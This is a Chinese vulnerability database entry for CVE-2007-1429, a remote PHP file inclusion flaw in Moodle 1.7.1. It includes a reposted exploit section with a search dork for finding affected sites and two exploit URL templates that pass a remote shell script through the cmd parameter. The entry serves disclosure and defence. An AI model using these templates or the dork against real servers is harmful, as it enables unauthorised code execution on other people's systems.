Moodle 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191355 漏洞类型 未知
发布时间 2007-03-12 更新时间 2007-03-12
CVE编号 CVE-2007-1429 CNNVD-ID CNNVD-200703-344
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/86563
https://cxsecurity.com/issue/WLB-2007030107
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-344
|漏洞详情
Moodle1.7.1版本中存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到(1)admin/utfdbmigrate.php或(2)filter.php的cmd参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
By Hasadya Raed
Contact : RaeD [At] BsdMail [Dot] Com
------------------------------------------------------------------------
--
Script : moodle-1.7.1
Dork : "Copyright (c) moodle"
------------------------------------------------------------------------
--
B.Files : 
utfdbmigrate.php
filter.php
------------------------------------------------------------------------
--
Exploits :
http://www.Victim.com/moodle/admin/utfdbmigrate.php?cmd=[Shell-Attack]
http://www.Victim.com/moodle/filter.php?cmd=[Shell-Attack]

-- 
_______________________________________________
Get your free email from http://bsdmail.com
|受影响的产品
Moodle Moodle 1.7.1
|参考资料

来源:BUGTRAQ
名称:20070311RemoteFileIncludeInScriptmoodle-1.7.1
链接:http://www.securityfocus.com/archive/1/archive/1/462556/100/0/threaded
来源:SUSE
名称:SUSE-SR:2007:015
链接:http://www.novell.com/linux/security/advisories/2007_15_sr.html
来源:SREASON
名称:2409
链接:http://securityreason.com/securityalert/2409